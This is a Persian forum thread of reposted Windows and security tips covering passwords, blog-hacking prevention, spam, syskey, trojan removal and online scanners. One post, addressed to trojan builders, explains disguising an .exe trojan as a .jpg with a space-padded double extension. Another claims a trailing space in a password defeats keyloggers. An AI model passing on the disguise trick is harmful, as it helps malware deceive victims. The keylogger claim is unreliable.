Appened To Existing Log File: اضافه کردن تمام موارد فایل Dump به فایل Log موجود.
Visual Notification: ضبط و ثبت اخطارهای دیداری.
Sound Notification: ضبط و ثبت اخطارهای صوتی.
Create Crash Dump File: ساخت یک فایل Dump در مواقع Crash برای بازبینی های بعدی.
در قسمت Application Errors خطاهایی که به تازگی در کار با سیستم برای کاربر اتفاق افتاده نمایش داده میشوند. با Highlight کردن هر کدام از آنها و فشردن دکمه View میتوانید فایل Dump یا همان حالت موقتی را که در بالا بحث کردم را مشاهده کنید. یادتان باشد متون نوشته شده در فایل موقت که شما مشاهده میکنید هر بار با Restart شدن سیستم به صورت اتوماتیک در فایل Log ذخیره میشوند. با فشردن دکمه Clear آن اخطار از لیست Application Errors حذف میشود.
برای مشاهده فایل Log برنامه Dr.Watson شما میتوانید از ویرایشگر WordPad استفاده کنید. این فایل را باید در همان مسیری که مشخص کردید بیابید (با نام DrWtsn32.log). البته مسیر پیش فرض خود برنامه به صورت زیر است:
Document and setting\All users\Application Data\Microsoft\Dr Watson
اگر نرم افزار خاصی را نصب کرده اید که به نظر شما مسبب از کار افتادن سیستمتان است، قبل از نصب برنامه یک تصویر لحظه ای از سیستم بگیرید و سپس به برنامه Dr.Watson اجازه دهید که یک تصویر لحظه ای دیگر را پس از انجام عمل نصب برنامه بگیرد. با این کار شما میتوانید به بخش پشتیبانی Microsoft کمک کنید که با مقایسه این تصاویر شما را در حل هر چه سریعتر مشکلتان یاری کنند.
در صورتی که از سیستمی با سرعت بالا استفاده میکنید توصیه میکنم تمام موارد Options را انتخاب کنید و Crash Dump Type را نیز در حالت Full قرار دهید تا فایل Log شما با جزئیات کامل ساخته شود.
بعد از تنظیم کردن برنامه کافیه که شما روی دکمه OK کلیک کنید تا برنامه در پشت پرده به کار خودش ادامه دهد. معمولا بعد از فشردن دکمه OK برنامه از دید شما پنهان میشود اما در بسیاری از مواقع به صورت یک آیکن در نوار وظیفه نمایش داده میشود که شما میتوانید با دوبار کلیک روی آن تنظیمات را تغییر دهید یا فایلهای موقت موجود را بازبینی کنید.
بعد از اجرای برنامه میتوانید با خیالی آسوده به سایر کارهای خود مشغول شوید و از اینکه یک نفر همواره مراقب و محافظ سیستم شماست لذت ببرید.
Behzad AZ
06-30-2010, 08:20 AM
در صورتی که به مسائل هک و تروجان های آن آشنا باشید قصد داریم ترفندی برای شما بازگو کنیم. مطمئنأ میدانید در صورتی که با استفاده از برنامه های تروجان ساز یک تروجان بسازید، فرمت این فایل سرور exe. خواهد بود. اما ما قصد داریم تا ترفندی کوچک را به شما آموزش دهیم که با استفاده از آن میتوانید بدون نیاز به نرم افزار خاصی در عین حالی که فرمت فایل exe است اما با فرمت jpg. و یا هر فرمتی که شما دوست دارید نمایش داده شود.
برای این کار:
ابتدا دقت کنید که سیستم شما قابلیت نمایش فرمتهای فایل ها را داشته باشد. برای فهمیدن این موضوع My Computer را باز کرده و از منوی Tools به Folder Options بروید. سپس تب View را باز کرده و دقت کنید که گزینه Hide extensions for known file types تیک نخورده باشد.
حال (ترفندستان) سراغ اصل مطلب برویم.
فایل مورد نظر که فرمت exe دارد را بیابید و بر روی آن راست کلیک کرده و Rename را انتخاب کنید. سپس قبل از exe. عبارت jpg. را تایپ نمایید (و یا هر فرمتی که دوست دارید). که به عنوان مثال فایلی با نام tarfandestan.exe به شکل tarfandestan.jpg.exe در خواهد آمد.
حال میبایست پس از عبارت jpg. دست خود را بر روی دکمه Space کیبورد نگاه داشته و بیش از 20 بار این کلید را بفشارید.
سپسEnter را بزنید.
خواهید دید که تنها فرمت jpg. به چشم میخورد و تنها نشانه ای که از exe. به چشم میخورد سه نقطه ای است که در سمت دیگر آیکون وجود دارد که اصلأ جلب توجه نمیکند.
Behzad AZ
06-30-2010, 08:20 AM
حتماً بارها برای شما پیش آمده است که هنگام ثبت نام در سایتها و یا ایجاد یک ID جدید در یاهو ، برای خود یک Password تعیین کنید. اما آیا تاکنون به این موضوع توجه کرده اید که پسوردهای ساده همانند اسم ها و تاریخ تولد، بسیار ساده لو میروند؟ اکنون 7 راه بسیار مفید را به شما معرفی خواهیم کرد که با استفاده از آنها میتوانید بهترین رمزهای عبور را برای خود تعیین کنید ، رمزهایی که در عین پیچیدگی در خاطر شما میمانند!
1- برای ایجاد کلمه عبور، از حروف بزرگ و کوچک و به صورت یک در میان و غیر متناوب استفاده کنید. مثال: TaRfAnDeStAn
2- حروف اول کلمات یک جمله را به عنوان رمز عبور خود انتخاب کنید. مثلأ در جمله "If sentence is longer password would be safer" که رمز عبور آن Isilpwbs میشود.
3- عدد یا تاریخی را برای خود در نظر بگیرید و آن را با دکمه Shift تایپ کنید. مثلأ تاریخ 13.06.2002 با دکمه Shift به این کلمه تبدیل می شود: !#>)^>@))@
4- لغتی را در نظر بگیرید (ترفندستان) و سپس حروف سمت راست آن را که بر روی صفحه کلید قرار دارد، بنویسید: مثال: Hardware تبدیل می شود به Jstfestr
5-لغت یا ترکیبی را برای خود در نظر بگیرید مانند “24October” و بعد آن را بهم بریزید به این صورت که حروف اول آن را با حرف آخر، حرف دوم را با حرف ماقبل آخر و به همین ترتیب بقیه را بنویسید: 24r4eObcot
6- لغات یک جمله را به اختصار بنویسید؛ این اختصارات را خود شما تعیین می کنید و از قاعده خاصی پیروی نمی کنند. مثلأ عبارت White meat with cabbage تبدیل می شود به whtmtwtcabge
7- در رمز عبور از علائم ویژه استفاده کنید. مثال: “c/Om%u §E~r
Behzad AZ
06-30-2010, 08:20 AM
یکی از کارهایی است که بعد از پیدا کردن IP صورت میگیرد؛ Whois جهت جمع آوری اطلاعات در مورد یک IP بکار میرود و با این کار شما میتوانید پی ببرید که این IP متعلق به چه شرکتی است، از کدام کشور یا شهر می باشد و حتی شماره تلفن ها،آدرس و ایمیل آن شرکت چیست؟ این ترفند پیرامون این موضوع میباشد.
بدین منظور:
کافی است به وب سایت http://www.dnsstuff.com (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3d3dy5kbnNzdHVmZi5jb20%3D) مراجعه کنید.
در قسمت WHOIS Lookup، آدرس IP مورد نظر را وارد کرده و Enter بزنید.
خواهید دید که تمامی مشخصات IP برایتان نمایان میشود.
Behzad AZ
06-30-2010, 08:20 AM
همانطور که اطلاع دارید جدیدأ هک شدن وبلاگها توسط هکر ها رایج شده است. به طوری که هر هکر یا گروه هکری کار هک خود را با هک وبلاگ ها آغاز میکند. میتوان گفت وبلاگ نیز یک سایت رایگان است اما امنیت این وبلاگها بر عهده کیست؟ میتوان به اطمینان گفت 99% امنیت وبلاگها در دست صاحبان وبلاگ است. در صورتی که مدیریت یک وبلاگ را بر عهده دارید حتماً این مطلب را بخوانید زیرا ترفندهایی بسیار مفید پیرامون جلوگیری از هک شدن وبلاگتان به شما معرفی کرده ایم.
هکرها چگونه وبلاگهای ما رو هک میکنند؟
1- هک کردن ایمیل صاحب وبلاگ
به طوری که هکر ایمیل صاحب وبلاگ را هک کرده بعد برای ورود به وبلاگ به قسمت فراموش کردن پسورد وبلاگ میرود. در این قسمت باید ایمیل صاحب وبلاگ زده شه تا پسورد وبلاگ به این ایمیل انتقال پیدا کند.پس هکر با در دست داشتن نام وبلاگ و داشتن پسورد ایمیل شما میتواند خیلی راحت به وبلاگتان دسترسی پیدا کند.
2- ایمیل جعلی
حیله دیگر هکر ها فرستادن ایمیل جعلی برای صاحبان وبلاگ است.به گونه ای که به طور دروغ خودشان را صاحب ارائه دهنده سرویس وبلاگشان معرفی میکنند و میخواهند از آنها که پسورد خود را برای آنها ایمیل کنید.
3- استفاده از صفحه های تقلبی
بعضی مواقع به شما آدرسهای ناآشنا پیشنهاد میشود.بعد از باز کردن این آدرس ها (ترفندستان) صفحه ای شبیه صفحه لاگین (صفحه ورودی به وبلاگ شما که یوزر نیم و پسورد را میخواهد) باز میشود. ولی آیا هر صفحه شبیه به آن صفحه لاگین ما باید مشخصاتمان را وارد نماییم? خیر. زیرا امکان دارد این مشخصات ما برای افراد غیر معتمد فرستاده شود.
4- استفاده از باگها
گاهی اوقات سرویس دهنده های وبلاگ نمیتوانند آن طور که باید امنیتشان را تامین کنند برای همین با پیدا شدن چند باگ (حفره امنیتی) راه هک کردن را برای هکر ها را باز میکنند. ولی این امر خیلی کم دیده میشود و میتوان گفت امکان چنین اتفاقی خیلی به ندرت دیده میشود. با این حال سعی کنید همواره از یک سرویس دهنده معروف استفاده کنید.
راههای جلوگیری از هک شدن وبلاگ
1- در مرحله اول سعی کنید وبلاگ خود را از یک سرویس دهنده مطمئن و مناسب انتخاب نمایید.
2- در نگه داشتن ایمیل خود (ترفندستان) توجه داشته باشید.
3- این را بدانید هرگز و تحت هیچ شرایطی صاحبان سرویس دهنده از شما پسورد وبلاگتان را نمیخواهند.
4- همیشه سعی کنید همه موارد صفحه لاگین (نوار آدرس و...) را کاملأ چک کرده و بعد نام کاربری و رمزعبور خودتان را وارد نمایید.
5- سعی کنید از یک پسورد مناسب استفاده کنید.
6- سعی کنید همیشه در پر کردن لیست اسم نویسی برای وبلاگ ایمیل با آی دی که در مسنجر از آن استفاده مینمایید تفاوت داشته باشد.
با استفاده و مد نظر گرفتن موارد بالا درصد هک شدن وبلاگ خود را تا حد زیادی کاهش داده اید.
Behzad AZ
06-30-2010, 08:21 AM
ممکن است برای شما نیز پیش آمده باشد که هنگام کار با کامپیوتر ، ویندوز شما بسیار کند و آزار دهنده عمل کند. می توان با اطمینان گفت که تمامی این مشکل ها از نحوه نادرست عملکرد شما با ویندوز صورت گرفته است. قصد داریم تا شما را با 10 ترفند مفید آشنا کنیم که با استفاده از آن ها میتوانید از ویندوز خود حداکثر استفاده را ببرید.
1- مطمئن شوید که آنتی ویروس مناسبی را بر روی سیستم نصب نموده اید به صورت اتوماتیک آپدیت شود و کلیه فایلهای تازه وارد به سیستمتان را چک کند و اگر ویروسی همراه فایلی باشد تعمیر،قرنطینه و یا بلوکه شود. بدلیل اینکه ویروسهای جدیدی هر روز تولید می شوند باید طوری ویروس کش را تنظیم کنید که بطور اتوماتیک به روز شود. دو آنتی ویروس قوی Kaspersky و Nod32 برای استفاده توصیه میشود.
2- نرم افزارهای AntiSpyware و AntiAdware را بر روی سیستم خود نصب کنید، این دو دسته نیز (ترفندستان) برای سیستم شما کاملأ ضروری هستند، تا از نصب برنامه های جاسوس بر روی سیستمتان جلوگیری کنند. که دو نرم افزار رایگان و مفید Spybot Search & Destroy یا Ad-aware را میتوان مثال زد.
3- نصب دیواره آتش سخت افزاری، بهتر از فایروال نرم افزاری است. بدین صورت اطلاعات سیستم شما از دسترس هکرها مصون می ماند و نمی توانند برخی نرم افزارها را بصورت ناخودآگاه بر روی سیستم شما نصب کنند که یا به سیستم شما آسیب برسانند و یا اینکه سرعت کار با سیستم کاهش پیدا کند. دیواره های آتش Linksys ،Netgear و D-link توصیه میشوند.
4- شرکت مایکروسافت هر از چند گاهی نرم افزارهای خود را به روز می کند. این امر برخی اوقات به دلایل بالا بردن امنیت است. توصیه ما این است سیستم خود را طوری تنظیم کنید تا بصورت اتوماتیک بروز شود.
5- فایلهای اینترنتی موقت Temporary Internet Files خود را هر یک ماه یکبار پاک کنید. این امر به بالا بردن سرعت سیستم شما منجر خواهد شد.
6- هر 4 ماه یکبار هارد خود را Defragment نمائید.
7- هر موقع می خواهید چیزی را از اینترنت دانلود کنید (ترفندستان) حتماً شرایط یا به اصطلاح Terms and Conditions آن را به دقت مطالعه نمائید. هیچ ارزانی بی حکمت نیست. ممکن است همراه نرم افزارهای رایگان مواردی از قبیل Adare یا Spyware نصب شوند.
8- ایمیلهای غریبه، عجیب و نا آشنا را باز نکنید. ممکن است همراه باز شدن آنها Adware یا Spyware بر روی سیستمتان نصب شوند یا همراه آنها ویروس باشند. توجه کنید حالت پیش نمایش نرم افزارهای Outlook همانند باز کردن آن است، پس آن را غیر فعال کنید.
9- به شما استفاده از مرورگر Firefox را از سایت http://www.mozilla.org (http://www.tarfandestan.com/engine/go.php?url=aHR0cDovL3d3dy5tb3ppbGxhLm9yZw%3D%3D) توصیه می کنیم. کار با این مرورگر ایمن تر است.
10-دست آخر اینکه اگر سیستم شما را دزدیدند یا سیستمتان به نحوی از کار افتاد، کلیه داده های خود را از دست می دهید. راه حل کار این است که همیشه از اطلاعات مهمتان بر روی CD/DVD و دیسکهای پرتابل و یا حتی بر روی میزبانهای اینترنتی نسخه پشتیبان تهیه کنید.
Behzad AZ
06-30-2010, 08:21 AM
قصد داریم ترفندی متفاوت را به شما معرفی کنیم که با استفاده از آن میتوانید به راحتی و با تایپ یک متن کوتاه در نرم افزار Notepad ویروسی به نام Eicar بسازید. این ویروس در حقیقت یک ویروس نمای استاندارد برای تست آنتی ویروسهاست. لازم به ذکر است این ویروس یک ویروس واقعی نیست و در حقیقت یک ویروس نما است و فقط برای تست آنتی ویروس شما مثل یک ویروس عمل میکند. میتوانید مطمئن باشید که Eicar به هیچ وجه به سیستم شما آسیبی نخواهد رساند. برای تکمیل توضیحات فوق باید گفت EICAR مخفف عبارت European Institute for Computer Antivirus Research می باشد.
بدین منظور:
از منوی Start به All Programs و سپس Accessories رفته (ترفندستان) و بر روی Notepad کلیک کنید.
حال در محیط Notepad کد زیر را عینأ Copy و Paste نمایید:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
پس از کپی کد فوق، از منوی File بر روی Save as کلیک کنید. سپس فایل را با نام دلخواه و پسوند دلخواه ذخیره کنید.
اکنون اگر به محلی که فایل در آن موجود است مراجعه کنید خواهید دید آنتی ویروس شما نسبت به فایل عکس العمل نشان داده و آن را ویروس تشخیص میدهد.
Behzad AZ
06-30-2010, 08:21 AM
یکی از مشکلاتی که تقریبأ گریبانگیر تمامی کاربران اینترنت است هک شدن ID آنها توسط هکر هاست. این مشکل بیشتر به دلیل عدم آشنایی کاربران مبتدی با مسائل امنیتی پیش میاید و هکرها از این موضوع سوء استفاده میکنند. اما پس از هک شدن ID یاهو چه باید کرد؟! جالب است بدانید فقط یک راه منطقی برای اینکار وجود دارد! که هم اکنون به توضیح آن خواهیم پرداخت. در صورتی که پسورد ID خود را نیز فراموش کرده اید این ترفند چاره شما خواهد بود.
هنگامی که ID کاربر هک میشود ، پس گرفتن ID بسیار ساده است ، به شرطیکه شما به هنگام ثبت این ID دقت کافی به خرج داده باشید!
به هنگام ثبت ID و ایمیل ، در فرم ثبت نام از شما درخواست ثبت سه گزینه میشود: تاریخ تولد ، کشور و کدپستی.
اگر این اطلاعات ورودی را به یاد داشته باشید کافی است به آدرس https://edit.yahoo.com/forgot (http://www.tarfandestan.com/site/engine/go.php?url=aHR0cHM6Ly9lZGl0LnlhaG9vLmNvbS9mb3Jnb3Q %3D) مراجعه کنید.
سپس در فیلد اول آیدی خودتان که پسورد آن هک شده یا فراموش کرده اید را وارد نمایید.
در فیلد بعدی نیز کد امنیتی داخل عکس را وارد کرده و Next بزنید.
در صفحه بعدی نیز اطلاعات خود را به ترتیب تاریخ تولد ، کشور و کدپستی وارد کنید و Next بزنید.
اگر از کاربران اخیر یاهو باشید به جای سوال فوق ، پاسخ سوال امنیتی که هنگام ثبت نام انتخاب کرده بودید را بایستی وارد کنید.
اگر اطلاعاتتان قابل تأیید باشد امکان تعریف پسورد جدید برایتان میسر خواهد شد.
Behzad AZ
06-30-2010, 08:21 AM
در ویندوز XP قابلیت بسیار عالی نهفته شده است که بسیاری از کاربران این ویندوز از آن بی خبرند. شما میتوانید علاوه بر پسوردی که برای هر یوزر در ویندوز تعریف میکنید ، پسورد دومی هم برای ورود به ویندوز قرار دهید و عملأ امنیت سیستم خود را دو چندان کنید. در این ترفند به معرفی این ترفند خواهیم پرداخت.
بدین منظور:
از منوی Start وارد Run شده و عبارت syskey را وارد نمایید. سپس Enter بزنید.
در پنجره کوچک ظاهر شده بر روی دکمه Update کلیک کنید.
اکنون تیک پسورد قسمت Password Startup را بزنید و با دقت فراوان دو بار پسورد خود را وارد نمایید.
پنجره را OK کنید تا پسورد در سیستم ذخیره (ترفندستان) شود.
همچنین شما با انتخاب Store Startup Key on Floppy Disk میتوانید پسورد خود را بر روی یک فلاپی دیسک ذخیره کنید تا تنها با استفاده از آن بتوانید وارد سیستم شوید.
از این پس با بالا آمادن سیستم به هنگام انتخاب یوزر کاربری ، از شما درخواست پسورد دوم میشود.
http://www.tarfandestan.com/images/stop.gif دقت کنید پسورد انتخابی را فراموش نکنید. در صورت فراموش کردن پسورد به هیچ عنوان امکان ورود به ویندوز را نخواهید داشت و ناچارأ باید ویندوز را از نو نصب کنید ، پس نهایت دقت را به کار ببرید.
mozhgan
02-15-2011, 10:09 PM
هفت روش حرفه ای برای ایجاد رمز عبور
۱- برای ایجاد کلمه عبور، از حروف بزرگ و کوچک و به صورت یک در میان و غیر متناوب استفاده کنید. مثال: PersiAn Ds
2- حروف اول کلمات یک جمله را به عنوان رمز عبور خود انتخاب کنید. مثلاًدر جمله:”If sentence is longer password would be er ” که رمز عبور آن Isilpwbs میشود.
۳- عدد یا تاریخی را برای خود در نظر بگیرید و آن را با دکمه Shift تایپ کنید. مثلاً : تاریخ: ۱۳٫۰۶٫۲۰۰۲ با دکمه Shift به این کلمه تبدیل می شود: !#>)^>@))@
4- لغتی را در نظر بگیرید و سپس حروف سمت راست آن را که بر روی صفحه کلید قرار دارد، بنویسید: مثال: Hardware تبدیل می شود به Jstfestr
5-لغت یا ترکیبی را برای خود در نظر بگیرید مانند “۲۴Oktober” و بعد آن را بهم بریزید به این صورت که حروف اول آن را با حرف آخر، حرف دوم را با حرف ماقبل آخر و به همین ترتیب بقیه را بنویسید: ۲۴r4eObkot
6- لغات یک جمله را به اختصار بنویسید ؛ این اختصارات را خود شما تعیین می کنید و از قاعده خاصی پیروی نمی کنند. مثلاً عبارت White meat with cabbage تبدیل می شود به whtmtwtcabge
7- در رمز عبور از علائم ویژه استفاده کنید. مثال: “c/Om%u §E~r
mozhgan
02-15-2011, 10:10 PM
یک روش ساده اما کارآمد برای حفظ رمز عبور
در الگوریتم بسیاری از نرم افزارهای جاسوسی صفحه کلید (KeyLoger) و تروجان ها ، کلید Space در انتهای پسورد در نظر گرفته نشده است.
از همین طریق میتوان این ترفند را صورت داد:
کافی است در پسوردی که برای خود ایجاد میکنید در پایان آن یک Space بزنید و یک فاصله ایجاد کنید. به همین راحت کار بسیاری از نرم افزارهای دشمن را دچار اختلال کرده اید.
دقت کنید از این به بعد باید هنگام وارد کردن پسورد ، Space را هم در پایان پسورد بزنید.
به عنوان مثال برای رمز عبور azardl کافی است آن را به صورت azardl ثبت کنیم.
هنگامی که پسورد شما هک میشود دیگر Space برای هکر نشان داده نمیشود و هکر پسورد را به همان شکل azardl میبیند.
mozhgan
02-15-2011, 10:12 PM
فعال سازی قابلیت مقابله با هکرها در ویندوز
برای فعال سازی آن:
۱- از منوی Start، به Contrl Panel بروید.
۲- بر روی Network and Internet Connections کلیک کنید.
۳- سپس Network Connections را انتخاب کنید.
۴- حال بر روی اتصال اینترنت خود، کلیک راست کرده و از منوی باز شده Properties را انتخاب کنید.
۵- از Tab, Advanced گزینه ی Internet Connection Firewall را فعال کنید.
۶- بر روی OK کلیک کنید.
mozhgan
02-15-2011, 10:13 PM
راهی ساده برای مقابله با تروجان Magic-PS
بدین منظور:
از منوی Start وارد Run شده و در آن عبارت regedit را وارد کرده و Enter بزنید تا رجیستری باز شود.
سپس به آدرس زیر بروید:
HKEY_CURRENT_USER/Softwaqre/microsoft/windows/current version/Runonce
سپس از قسمت دیگر دنبال متغیری با نام SVCHOST یا svchost بگردید و اگر وجود داشت آن را پاک کنید.
همین عمل را در آدرس زیر نیز اعمال کنید:
HKEY_LOCAL_MACHIN/software/microsoft/windows/curren version/run
در پایان سیستم را مجددأ راه اندازی کنید.
mozhgan
02-15-2011, 10:17 PM
آنتی ویروس های آنلاین اینترنتی
یکی از مشکلاتی که کاربران به ویژه کاربران ایرانی دارند استفاده از آنتی ویروس ها برای اسکن کردن سیستم خود از وجود ویروس است. مشکلاتی از قبیل حجم زیاد نرم افزارهای آنتی ویروس ، نیاز به کرک کردن برای استفاده کامل و … . در این ترفند قصد داریم چندین سرویس آنلاین را به شما معرفی کنیم که با بهره گیری از آنها میتوانید بدون نیاز به نرم افزار آنتی ویروس خاصی ، سیستم خود را از طریق اینترنت و به شکلی کاملأ رایگان اسکن کنید.
برای استفاده از این سرویس ها ، کافی است به سایتهای زیر رفته و از قابلیتهای موجود استفاده کنید:
Symantec Security Check (http://security.norton.com/sscv6/default.asp?langid=ie&venid=sym)
McAfee FreeScan (http://us.mcafee.com/root/mfs/default.asp?affid=294)
Panda ActiveScan (http://www.pandasoftware.com/activescan/)
Kaspersky lab (http://www.kaspersky.com/remoteviruschk.html)
Bitdefender (http://www.bitdefender.com/scan/licence.php)
RAV (http://www.ravantivirus.com/scan/)
kamyabonline (http://kamyabonline.com/)
Trend Micro (http://housecall.trendmicro.com/housecall/start_corp.asp)
SYGATE (http://scan.sygate.com/)
AuditMyPc (http://www.auditmypc.com/)
Shields UP!! (https://grc.com/x/ne.dll?bh0bkyd2)
VIRUS SCANNERS ON-LINE (http://blogs.dotnethell.it/vincent/Post_2046.aspx)
Free Antivirus Removal Tools (http://blogs.dotnethell.it/vincent/Post_2953.aspx)
mozhgan
02-15-2011, 10:52 PM
ترفندهایی برای کاهش Spam
اسپم به زبان ساده ایمیلهای ناخواسته ای است که معمولا به صورت انبوه برای شما ارسال میشوند.اسپمها یکی از متداولترین و در عین حال منفی ترین جنبه های دارا بودن یک آدرس Email است . با این که در حال حاضر و با توجه به تکنولوژی های موجود امکان حذف کامل این نوع از نامه های الکترونیکی ناخواسته وجود ندارد ، ولی قصد داریم ترفندهایی را به شما معرفی کنیم که با استفاده از آنها می توانید تعداد آنها را کاهش دهید .
Spam
یکی از متداولترین و در عین حال منفی ترین جنبه های دارا بودن یک آدرس Email است . با این که در حال حاضر و با توجه به تکنولوژی های موجود امکان حذف کامل این نوع از نامه های الکترونیکی ناخواسته وجود ندارد ، ولی می توان با استفاده از برخی روش های موجود تعداد آنان را کاهش داد .
Spam ، نسخه الکترونیکی از ” نامه های بدرد نخور ” است . واژه Spam به پیام های الکترونیکی ناخواسته ، اطلاق می گردد . این نوع از نامه های الکترونیکی ارتباط مستقیمی با ویروس نداشته و حتی ممکن است پیام هائی که از منابع معتبر ارسال شده اند نیز در زمره این گروه قرار گیرند .
چگونه می توان میزان Spam را کاهش داد ؟
با رعایت برخی نکات ، می توان میزان Spam دریافتی را بطرز محسوسی کاهش داد :
آدرس Email خود را بدون دلیل در اختیار دیگران قرار ندهید . آدرس های پست الکترونیکی به اندازه ای متداول شده اند که شما می توانید بر روی هر فرمی که به منظور کسب اطلاعات شما در نظر گرفته می شود ، وجود فیلد خاصی به منظور دریافت آدرس Email را مشاهد نمائید . تعدادی زیادی از مردم بدون درنظر گرفتن مسائل جانبی ، آدرس Email خود را در هر محلی و یا هر فرمی درج می نمایند . مثلا” شرکت ها ، اغلب آدرس ها را در یک بانک اطلاعاتی ثبت تا بتوانند وضعیت مشتیریان خود را در آینده دنبال نمایند . برخی اوقات ، اطلاعات فوق به سایر شرکت ها فروخته شده و یا امکان استفاده مشترک برای آنان ، فراهم می گردد . بدیهی است در چنین مواردی ممکن است برای شما یک Email و از طرف شرکتی ارسال شود که نه توقع آن را داشته اید و نه از آنان درخواستی مبنی بر ارائه اطلاعات خاصی را داشته اید.
بررسی سیاست های محرمانگی . قبل از ارسال آدرس Email خود به صورت online ، بدنبال Privacy سایت مورد نظر بگردید .تعداد بسیار زیادی از سایت های شناخته شده و خوشنام دارای یک لینک خاص بر روی سایت خود به منظور آشنائی کاربران با سیاست های آن سایت در خصوص نحوه برخورد با اطلاعات ارسالی شما می باشند . (همواره این پرسش را برای خود مطرح نمائید که آیا ما آدرسEmail خود را در سایت هائی درج می نمائیم که نسبت به آنان شناخت کافی داریم ؟) . شما می بایست قبل از ارسال آدرس Email خود و یا سایر اطلاعات شخصی ، سیاست های اعلام شده توسط سایت مورد نظر را مطالعه نموده و از این موضوع آگاه شوید که مالکین و یا مسئولین سایت قصد انجام چه کاری را با اطلاعات ارسالی شما دارند .
دقت لازم در خصوص گزینه هائی که به صورت پیش فرض فعال شده اند . زمانی که شما برای دریافت خدمات و یا Account جدید عملیات sign in را انجام می دهید ، ممکن است بخشی وجود داشته باشد که به شما مجموعه ای از گزینه ها را در خصوص دریافت email در خصوص محصولات و یا سرویس های جدید ، ارائه نماید . در برخی مواقع ، گزینه ها به صورت پیش فرض انتخاب شده اند ، بنابراین در صورتی که شما آنان را به همان وضعیت باقی بگذارید ، در آینده نه چندان دور برای شما حجم زیادی از نامه های الکترونیکی که شاید انتظار آنان را نداشته باشد ، ارسال گردد .
استفاده از فیلترها : تعدادی زیادی از برنامه های پست الکترونیکی امکان فیلترینگ را ارائه می نمایند . پتانسیل فوق به شما این اجازه را خواهد داد که آدرس های خاصی را بلاک نموده و یا امکان دریافت نامه را صرفا” از طریق لیست تماس موجود بر روی کامپیوتر خود ، داشته باشید. برخی مراکز ارائه دهنده خدمات اینترنت ( ISP ) نیز سرویس فیلترینگ و علامت گذاری مربوط به مقابله با Spam را ارائه می نمایند . در چنین مواردی ممکن است پیام های معتبری که بدرستی طبقه بندی نشده باشند به عنوان spam درنظر گرفته شده و هرگز به صندوق پستی شما ارسال نگردند .
هرگز برروی لینک های موجود در یک Spam ، کلیک ننمائید . برخی از منابع ارسال کننده Spam با ارسال آدرس های Email متغیر در یک Domain خاص ، سعی در تشخیص معتبر بودن یک آدرس Email می نمایند. ( مثلا” تشخیص آدرس های Email معتبر موجود بر روی hotmail و یا yahoo ) .در صورتی که شما بر روی یک لینک ارسالی توسط یک Spam کلیک نمائید ، صرفا” معتبر بودن آدرس Email خود را به اطلاع آنان رسانده اید . پیام های ناخواسته ای که یک گزینه “عدم عضویت ” وسوسه انگیز را در اختیار شما قرارمی دهند ، اغلب به عنوان روشی به منظور جمع آوری آدرس های Email معتبر مورد استفاده قرار گرفته که در آینده از آنان به منظور ارسال Spam استفاده گردد .
غیرفعال نمودن گزینه دریافت اتوماتیک گرافیک در نامه های الکترونیکی با فرمت HTML . تعداد زیادی از شرکت ها ، نامه های الکترونیکی را با فرمت HTML و همراه با یک فایل گرافیکی لینک شده ارسال نموده که در ادامه از آن به منظور ردیابی فردی که پیام الکترونیکی را باز نموده است ، استفاده می نمایند . زمانی که برنامه سرویس گیرنده پست الکترونیکی شما ، اقدام به download گرافیک از سرویس دهنده آنان می نماید ، آنان می دانند که شما پیام الکترونیکی را باز نموده اید . با غیر فعال نمودن HTML mail و مشاهده پیام ها با فرمت صرفا” متن ، می توان پیشگیری لازم در خصوص این مسئله را انجام داد .
ایجاد و یا بازنمودن Account های جدید اضافی : تعداد زیادی از سایت ها ، اقدام به عرضه آدرس پست الکترونیکی به صورت رایگان می نمایند . در صورتی که شما بطور مداوم اقدام به ارسال آدرسEmail خود می نمائید ( برای خرید online ، دریافت سرویس و … ) ، ممکن است مجبور به ایجاد یک account دیگر به منظور حفاظت آدرس account اولیه خود در مقابل spam شوید . شما همچنین می بایست از یک account دیگر در زمانی که اطلاعاتی را بر روی بولتن های خبری online ، اطاق های چت ، لیست های عمومی Mailing و یا USENET ارسال می نمائید، استفاده نمائید . بدین تریتب می توان یک سطح حفاظتی مناسب در خصوص دریافت spam به آدرس Email اولیه خود را ایجاد کرد.
برای سایرین Spam ارسال ننمائید . یک کاربر متعهد و دلسوز باشید . در خصوص پیام هائی که قصد فوروارد نمودن آنان را دارید ، سختگیرانه عمل کنید . هرگز هرگونه پیامی را برای هر شخص موجود در لیست دفترجه آدرس خود فوروارد نکرده و اگر فردی از شما بخواهد که پیامی را برای وی فوروارد ننمائید ، به درخواست وی احترام بگذارید .
mozhgan
02-15-2011, 10:53 PM
کامپیوتر خود را ضد ضربه کنید !
قصد داریم ۱۴ ترفند فوق العاده برای افزایش امنیت سیستم شما معرفی کنیم. ترفندهایی که با اطمینان میتوان گفت امنیت سیستم شما را تا ۸۰ درصد تضمین میکند و با عمل کردن به آنها میتوانید به طور تمام و کمال کامپیوتر خود را ضد ضربه کنید!
به دلیل این که هر روز ترفندهای جدیدی برای ویروسی کردن و هک کردن کاربران کامپیوترهای شخصی به وجود می آید این ترفند نگارنده شده است که باعث افزایش ۸۰ درصدی امنیت کامپیوتر شما می شود.
هر روزه شما هدف حمله ها و خطرهای بیشماری در اینترنت قرار می گیرید که از نظر تعداد می توان ۹۵ تا از هر صد حمله را متوقف کرد ولی همین ۵ خطر باعث کاهش امنیت به مقدار ۲۰% می شوند چون این خطرها توسط افراد عادی و تازه کار نیست و عاملان آنها در کار خود بسیار تبهر دارند ، در اکثر موارد می توانند از تمام مرزهای امنیتی بگذرند و به طور کامل به مقصود خود برسند .
استفاده از یک نرم افزار ضد هکر با آخرین به روز رسانی ها که من Black Ice را پیشنهاد می کنم چون نیازهای کاربران حرفه ای و تازه کار را به طور کامل برطرف می کند. البته Zone Alarm که از ورژن ۵ به بعد به ضد ویروس هم مجهز شده نیز انتخاب خوبیست ولی باید بدانید این نرم افزار نیاز به آموزش دارد {باید کتاب آموزشی آن که به تازگی منتشر شده را خریداری کنید} و بیشتر برای کاربران حرفه ای طراحی شده و کاربران تازه کار نمی توانند از آن به درستی استفاده کنند.
۲: استفاده از ویروس کشهای Norton Anti Virus 2005 و McAfee و Pandaکه اگر Pack کامل باشد خیلی بهتر است { پک کامل شاملAnti Virus ، Anti Spyware/Adware، Firewall ، Anti spam، Security Center، Privacy Service می باشد}
